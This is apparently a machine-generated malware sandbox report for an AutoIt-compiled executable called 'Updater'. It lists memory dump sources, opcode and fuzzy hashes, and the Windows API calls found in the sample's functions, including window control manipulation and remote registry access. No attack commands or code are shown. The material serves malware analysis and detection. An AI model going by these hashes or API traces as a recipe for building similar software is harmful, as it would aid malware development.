                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 323db9accf14f3090eec3d0a87b25f30b364fe91438709469afbe282fd986862
                                                                                                  • Instruction ID: 43dd9f72e798cc05ef13b3ebb69cd5e14a7f6e4060c3b3913c552cc329653271
                                                                                                  • Opcode Fuzzy Hash: 323db9accf14f3090eec3d0a87b25f30b364fe91438709469afbe282fd986862
                                                                                                  • Instruction Fuzzy Hash: ACE16D3170112B8BDF4CCA69C8B00BE76A2EB94770725432D9E67D73C4EA64D925DBA0
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: b5b3e5219c24e38db487436f5840cf4e1437969e14af223875bf10b042f87811
                                                                                                  • Instruction ID: ec4b3777538695c868ce941b4b4208c8f4c05e4631b4d420c8763aa1f6fd3ed9
                                                                                                  • Opcode Fuzzy Hash: b5b3e5219c24e38db487436f5840cf4e1437969e14af223875bf10b042f87811
                                                                                                  • Instruction Fuzzy Hash: A9F16D3170112B8BDF0CCA6DC8B00BE76E2AB94771715432D9E67D77C4EE64DA25CAA0
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 28e35ac769e7317f25c8d2f7079bfb7ba7f6bb36bb2429e733617ce6d81fc8a1
                                                                                                  • Instruction ID: fcffee9a332c84a561ba6599e64e22272f9ee7203a3c1b8200922a4aada325b4
                                                                                                  • Opcode Fuzzy Hash: 28e35ac769e7317f25c8d2f7079bfb7ba7f6bb36bb2429e733617ce6d81fc8a1
                                                                                                  • Instruction Fuzzy Hash: 20E1503170122B4BDF0CCA6DC8700BE76E2EB94771B25432D9E67D73C4EA64D925CAA0
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 46b54dea1489af7714f44b6ae1e99605e4607c9557ac97342ba02afe34281449
                                                                                                  • Instruction ID: 626087c3aa3deed198b69763bda521bc0378f14f3f43aa40ecc4af98b2dbd0a0
                                                                                                  • Opcode Fuzzy Hash: 46b54dea1489af7714f44b6ae1e99605e4607c9557ac97342ba02afe34281449
                                                                                                  • Instruction Fuzzy Hash: 7B212B327201108FD718CE79C81367AB7E5A755310F15862EF4A7C73C1CE39A9008B84
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2238771515.00000000014BF000.00000040.00000020.00020000.00000000.sdmp, Offset: 014BF000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_14bf000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 2d5486f6e5b9d9d61447aadb6395f99df315b0362e95f2a9dd6700af68e1202b
                                                                                                  • Instruction ID: 2a4c341ee323e34329150b9ad8fc3a8913384d918951c853ab65850e931dea43
                                                                                                  • Opcode Fuzzy Hash: 2d5486f6e5b9d9d61447aadb6395f99df315b0362e95f2a9dd6700af68e1202b
                                                                                                  • Instruction Fuzzy Hash: A1F054362141628FE7A1CE69C5E0B96BBA4EB50D70F2D056ED25497671C330E844C650
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2238771515.000000000149A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0149A000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_149a000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: c2a2d129c8543363c052d008b34330d58e57021dec0e7df0c1a6226ed5b22a4b
                                                                                                  • Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
                                                                                                  • Opcode Fuzzy Hash: c2a2d129c8543363c052d008b34330d58e57021dec0e7df0c1a6226ed5b22a4b
                                                                                                  • Instruction Fuzzy Hash:
                                                                                                  APIs
                                                                                                  • DeleteObject.GDI32(00000000), ref: 00753674
                                                                                                  • DeleteObject.GDI32(00000000), ref: 00753687
                                                                                                  • DestroyWindow.USER32 ref: 00753696
                                                                                                  • GetDesktopWindow.USER32 ref: 007536B1
                                                                                                  • GetWindowRect.USER32(00000000), ref: 007536B8
                                                                                                  • SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 007537E7
                                                                                                  • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 007537F5
                                                                                                  • CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0075383C
                                                                                                  • GetClientRect.USER32(00000000,?), ref: 00753848
                                                                                                  • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00753884
                                                                                                  • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007538A6
                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007538B9
                                                                                                  • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007538C4
                                                                                                  • GlobalLock.KERNEL32(00000000), ref: 007538CD
                                                                                                  • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007538DC
                                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 007538E5
                                                                                                  • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007538EC
                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 007538F7
                                                                                                  • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00753909
                                                                                                  • OleLoadPicture.OLEAUT32(?,00000000,00000000,00770BEC,00000000), ref: 0075391F
                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 0075392F
                                                                                                  • CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 00753955
                                                                                                  • SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 00753974
                                                                                                  • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00753996
                                                                                                  • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00753B83
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                                  • String ID: $AutoIt v3$DISPLAY$static
                                                                                                  • API String ID: 2211948467-2373415609
                                                                                                  • Opcode ID: 1ca19fead26b08d5c6411aeec0905c03602a1567ba7ec132a5831e55fe6ee68d
                                                                                                  • Instruction ID: e3c1e4e13f2b6af1c81b23aba81208085e7c5b3885cf0eee4aadf7a3eb75a327
                                                                                                  • Opcode Fuzzy Hash: 1ca19fead26b08d5c6411aeec0905c03602a1567ba7ec132a5831e55fe6ee68d
                                                                                                  • Instruction Fuzzy Hash: 63028071A10214EFDB14DF64CC89EAE7BB9FB49351F008158F9059B2A1DBB8EE05CB64
                                                                                                  APIs
                                                                                                  • CharUpperBuffW.USER32(?,?), ref: 00760288
                                                                                                  • _wcslen.LIBCMT ref: 0076029D
                                                                                                  • IsWindowVisible.USER32(?), ref: 007602DF
                                                                                                  • _wcslen.LIBCMT ref: 007602F5
                                                                                                  • IsWindowEnabled.USER32(?), ref: 00760331
                                                                                                  • _wcslen.LIBCMT ref: 00760347
                                                                                                  • _wcslen.LIBCMT ref: 00760394
                                                                                                    • Part of subcall function 006F014F: _wcslen.LIBCMT ref: 006F015A
                                                                                                    • Part of subcall function 00732E91: SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00732F15
                                                                                                    • Part of subcall function 00732E91: SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00732F28
                                                                                                    • Part of subcall function 00732E91: SendMessageW.USER32(?,00000189,?,00000000), ref: 00732F58
                                                                                                    • Part of subcall function 00732A02: SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00732A0D
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _wcslen$MessageSend$Window$BuffCharEnabledUpperVisible
                                                                                                  • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                                                                  • API String ID: 37000740-45149045
                                                                                                  • Opcode ID: 4af2951e8578aa10b8d4881df0d95037bda42e006fcc4e343eca2f275d6a5591
                                                                                                  • Instruction ID: 361889384cba8218b6ac20c03b639bf5323159a6c1d2b42fa782f34d3bc1f409
                                                                                                  • Opcode Fuzzy Hash: 4af2951e8578aa10b8d4881df0d95037bda42e006fcc4e343eca2f275d6a5591
                                                                                                  • Instruction Fuzzy Hash: D0029E342042019FDB54EF14C454A6A7BA2BF95348F14846CFC4B9B3A3DB39ED4ACB86
                                                                                                  APIs
                                                                                                  • DestroyWindow.USER32(?,?,?), ref: 006E5689
                                                                                                  • SendMessageW.USER32(00000000,00001308,?,00000000), ref: 00729128
                                                                                                  • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00729161
                                                                                                  • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 0072958E
                                                                                                    • Part of subcall function 006E438C: InvalidateRect.USER32(?,00000000,00000001,?,?,?,006E5687,01433E38,?,?,?), ref: 006E43EF
                                                                                                  • SendMessageW.USER32(?,00001053), ref: 007295CA
                                                                                                  • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 007295E1
                                                                                                  • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 007295F7
                                                                                                  • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00729602
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
                                                                                                  • String ID: 0
                                                                                                  • API String ID: 2760611726-4108050209
                                                                                                  • Opcode ID: b03e06fb5c2a898ee6f58c5ac20b3e97696edec4ff00a149ed1a68eec3f8f232
                                                                                                  • Instruction ID: ca48ce61e90c5889d1556bd1c15390e88577d5f635127933df0adb2f060ce4e4
                                                                                                  • Opcode Fuzzy Hash: b03e06fb5c2a898ee6f58c5ac20b3e97696edec4ff00a149ed1a68eec3f8f232
                                                                                                  • Instruction Fuzzy Hash: 9E12CF30600661EFDB21DF25D884BA5B7E6FF04304F588569F68A8B262C735EC52CF95
                                                                                                  APIs
                                                                                                  • DestroyWindow.USER32(00000000), ref: 007532EF
                                                                                                  • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 007533BA
                                                                                                  • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 007533F8
                                                                                                  • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00753408
                                                                                                  • CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 0075344E
                                                                                                  • GetClientRect.USER32(00000000,?), ref: 0075345A
                                                                                                  • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 007534A1
                                                                                                  • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 007534B0
                                                                                                  • GetStockObject.GDI32(00000011), ref: 007534C0
                                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 007534C4
                                                                                                  • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 007534D4
                                                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 007534DD
                                                                                                  • DeleteDC.GDI32(00000000), ref: 007534E6
                                                                                                  • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00753512
                                                                                                  • SendMessageW.USER32(00000030,00000000,00000001), ref: 00753529
                                                                                                  • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00753564
                                                                                                  • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00753578
                                                                                                  • SendMessageW.USER32(00000404,00000001,00000000), ref: 00753589
                                                                                                  • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 007535B9
                                                                                                  • GetStockObject.GDI32(00000011), ref: 007535C4
                                                                                                  • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 007535CF
                                                                                                  • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 007535D9
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                                  • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                                  • API String ID: 2910397461-517079104
                                                                                                  • Opcode ID: ea5138015c4fe2b3cbef2c5532e8f13486affa35114f7a3b83d9f2bed26c05de
                                                                                                  • Instruction ID: dffdbb015ee6618d27eba4aff639e46c1073c447b822e4b5f747e83224d68f11
                                                                                                  • Opcode Fuzzy Hash: ea5138015c4fe2b3cbef2c5532e8f13486affa35114f7a3b83d9f2bed26c05de
                                                                                                  • Instruction Fuzzy Hash: A1A19571A10214BFDB14DF64DC49FAF7BB9EB49710F008115FA15AB2E1DAB8AD01CB64
                                                                                                  APIs
                                                                                                  • GetForegroundWindow.USER32 ref: 007352BE
                                                                                                    • Part of subcall function 00735096: CharUpperBuffW.USER32(?,?,00000000,0076D938,?,00000000,?,?,?,00735334,-00000001,-00000001,-00000002,-00000001), ref: 00735123
                                                                                                  • _wcslen.LIBCMT ref: 00735344
                                                                                                  • _wcslen.LIBCMT ref: 007353B0
                                                                                                  • GetForegroundWindow.USER32 ref: 007353F5
                                                                                                  • _wcslen.LIBCMT ref: 00735406
                                                                                                  • IsWindow.USER32(?), ref: 00735446
                                                                                                  • _wcslen.LIBCMT ref: 00735483
                                                                                                  • _wcslen.LIBCMT ref: 007354DE
                                                                                                  • _wcslen.LIBCMT ref: 00735547
                                                                                                  • _wcslen.LIBCMT ref: 007355AB
                                                                                                  • _wcslen.LIBCMT ref: 0073560C
                                                                                                  • _wcslen.LIBCMT ref: 0073566C
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _wcslen$Window$Foreground$BuffCharUpper
                                                                                                  • String ID: <jy$@jy$ACTIVE$CLASS$Djy$HANDLE$Hjy$LAST$REGEXPCLASS$REGEXPTITLE$h<jy$h@jy$hDjy
                                                                                                  • API String ID: 86693105-4091155465
                                                                                                  • Opcode ID: 44718af64ac82a66952087151c27885ec0a91b08a7e7bc58303ee77d2582423b
                                                                                                  • Instruction ID: 67e03e7c9f92d6b8236c4e6f781d081344c68470761d661c8600fc6959f354c4
                                                                                                  • Opcode Fuzzy Hash: 44718af64ac82a66952087151c27885ec0a91b08a7e7bc58303ee77d2582423b
                                                                                                  • Instruction Fuzzy Hash: CFE12D71A047029BEB14DF68D4819BAB3B2FF50344F40852DE45287652FB78FD59CB92
                                                                                                  APIs
                                                                                                  • GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 014A945E
                                                                                                    • Part of subcall function 014A941D: GetProcAddress.KERNEL32(00000000), ref: 014A943B
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2238771515.000000000149A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0149A000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_149a000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AddressHandleModuleProc
                                                                                                  • String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
                                                                                                  • API String ID: 1646373207-1918263038
                                                                                                  • Opcode ID: 40434d9de5454e60802a0820427540b6c5adf449d9b3c4f8267f3955e4f02b2f
                                                                                                  • Instruction ID: 94383d7c7292974bf90771adf369221cf953d622dc3e0f1649e956f197591b58
                                                                                                  • Opcode Fuzzy Hash: 40434d9de5454e60802a0820427540b6c5adf449d9b3c4f8267f3955e4f02b2f
                                                                                                  • Instruction Fuzzy Hash: 334142A17096569B52146B6EF44082677DEE7742183F3803FB414CB779DF34AC028FAA
                                                                                                  APIs
                                                                                                  • CharUpperBuffW.USER32(?,?), ref: 00760CF0
                                                                                                  • _wcslen.LIBCMT ref: 00760D27
                                                                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00760D68
                                                                                                  • _wcslen.LIBCMT ref: 00760D78
                                                                                                  • _wcslen.LIBCMT ref: 00760DBF
                                                                                                  • _wcslen.LIBCMT ref: 00760E31
                                                                                                  • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00760E72
                                                                                                  • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00760EA4
                                                                                                    • Part of subcall function 006F014F: _wcslen.LIBCMT ref: 006F015A
                                                                                                    • Part of subcall function 00733498: SendMessageW.USER32(?,0000102B,?,00000000), ref: 007334F8
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _wcslen$MessageSend$BuffCharUpper
                                                                                                  • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                                                  • API String ID: 1103490817-719923060
                                                                                                  • Opcode ID: f22c5a79b66a7188e35447ce9952916df92aa18490669904c8bfa018ca8c3685
                                                                                                  • Instruction ID: 1322813a5d18a134b700618a86623d5b678a9a7dd9d7aceecbbe3327bd7e1b9a
                                                                                                  • Opcode Fuzzy Hash: f22c5a79b66a7188e35447ce9952916df92aa18490669904c8bfa018ca8c3685
                                                                                                  • Instruction Fuzzy Hash: 93D104307042119FCB14EF28C855A6A77A2AF85314F04896DFC5B9B3A3DB3AED45C786
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _wcslen
                                                                                                  • String ID: (jy$<jy$@jy$CLASS$CLASSNN$Djy$Hjy$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                                  • API String ID: 176396367-1134008298
                                                                                                  • Opcode ID: 774c88e633b4870b7ae236ab464a760c2c0d08fde359655670b9782e4346961a
                                                                                                  • Instruction ID: a4bcfc3172168176b096db8a0ce06b70ad80db279c78ee3d256062062151a0f4
                                                                                                  • Opcode Fuzzy Hash: 774c88e633b4870b7ae236ab464a760c2c0d08fde359655670b9782e4346961a
                                                                                                  • Instruction Fuzzy Hash: 73D1B471E00205ABEB1CDFA4D881BEEB775BF15304F50C129E91AA7202EB39BD59CB51
                                                                                                  APIs
                                                                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0075CEBD
                                                                                                  • RegCreateKeyExW.ADVAPI32(?,?,00000000,0076D938,00000000,?,00000000,?,?), ref: 0075CF44
                                                                                                  • RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 0075CFA4
